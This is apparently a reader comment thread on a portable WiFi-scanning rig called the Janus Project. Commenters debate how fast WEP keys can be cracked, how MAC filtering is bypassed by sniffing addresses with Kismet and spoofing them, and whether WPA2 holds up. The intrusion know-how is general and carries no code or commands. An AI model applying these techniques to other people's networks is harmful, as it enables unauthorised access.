Janus Project PC can scan 300 WiFi networks at once

Keyboard I-Rocks KR-6810

Can break WEP keys in under 5 minutes?!? WOW!

Ok, so what if I have MAC-based access as well...?

Unless you can access into my ap (of which you would have to have an allowed MAC address), find the MAC access list, spoof your MAC for one of the allowed MACs... which you would need to access my ap (of which you would have to have an allowed MAC address)...

See a problem here?

[re: James Bishop]

It would be nice if people would learn that all hackers are not evil! I hack but I do not do it for nefarious reason and never to steal anything, only to learn; no different then a shade-tree mechanic with toolbox and his car.

So the "genius" part is? I mean its a really cool hackjob but it doesn't sound like he has done anything remarkable. If they actually said anything about how he set it up it would be another thing entirely but from the blurb it sounds like he just put together off the shelf code. Am I missing something really cool?

Haven't seen this one yet, but wasn't JANUS the name of the villanous organization in "Goldeneye" for N64?

@bpc
Dude, thanks for that - I was about to chime in on the Sneakers mis-quote.

@Wes -

No one would have to have access to your router - the mac address of your nic can be sniffed out by the same tools that are used to break the WEP key - then it can simply be spoofed. This is extremely easy for someone who knows how to break a wep key to do. The only way to truely secure it would be to use some other sort of encryption, i.e. WPA, WPA2, etc. etc.

Mad filtering is easy to get around.. Use Kismet to sniff the network and it will show you the mac addresses of the systems attached to the network... then all you have to do is use a mac address changer and voila.. you are on the network. Wep will only protect you for 5-10 min past that.. Best bet ... turn the wireless off and make like Glade and "plug it in ... plug it in" *grin*

@Wes

Why do I need to get into your AP for the MAC exactly? The MAC broadcasts freely in the clear anytime you talk to your AP and it's possible to pull it from the traffic and clone it, no biggie. Yes, there would be a duplicate MAC on the network but if one has more power than the other the stronger one wins - gotta love directional antennas. MAC access filtering doesn't slow down an attacker using Linux tools which tend to be ALOT more flexible than Windows.

The 5min claim is what seems a bit farfetched. I know how to break WEP as I've done it myself with my own paws, not watched some demonstration on a stage. In my experience it takes a bit longer than 5mins which is why I questioned it in the first place. If you simply accumulate traffic yourself then it will take ALOT longer even on a really busy network - I did mine while downloading Torrents and it took a good half hour. If you use a second NIC it's possible to cause the target network to spew traffic in response and you can build up a pile of packets much more quickly but no, not 5mins in my experience and it's ALOT noisier since it's not passive. When you've got enough packets though it only takes SECONDS to get the key even if it's a lengthy HEX key created randomly. Kind of fun to watch it break actually :-)

Rolling the key works, you can change it faster than the attacker can accumulate traffic to crack it. Terrific! Now do it across hundreds of clients :-) Not going to happen with WEP, at least not the preshared key stuff you run at home with even a handful of clients. WPA does something like this although depending upon the version of WPA that too has some vulnerabilities during the initial client association. I understand WPA alot less and there's still alot of hardware out there that won't support it too.

It *is* possible to secure wireless, it's just not so easy that it can be done without some thought. Some of the protocols have been pretty flawed but it's better than nothing.

Me? I run 128bit WEP. I know it can be broken but it's a clear No Tresspassing sign so if I do catch someone on my network I can hunt them down and have a clear legal case. I wouldn't even bother with MAC filtering, not worth the added hassle for you and not a significant detterant to the attacker...

WPA2 with MAC filtering and signal power dropped to a 25 foot range. I challenge you to get into my network. Because you would have to park in my driveway to be close enough to get signal. And if you were in my driveway, I would shoot you. I live in Vermont, we are crazy bastards up here. And yes, it is legal to shoot trespassers.

Everyone should check out WiCrawl , a project that aims to do a very similar task. It is in alpha release at the moment and should be available to the public very soon. The applilcation aims to be the next step in wifi scanning.

Actually it looks more like a Storm Case, http://www.stormcase.com/.

Nice box the guy built.

The thing is that it probably still couldn't break WPA2(AES)-PSK with a strong password or WPA2-Enterprise with something like EAP-TLS on a radius server, because he'd have to break the key, not just sniff out a few WEP packets. Eight radios makes it fast to sniff out packets but does not nessesarily mean he can crack a well configured WPA setup.

Maybe he could though...

I am DUMB, I wish I were that brilliant.

that's.....so bad ass.
*drool*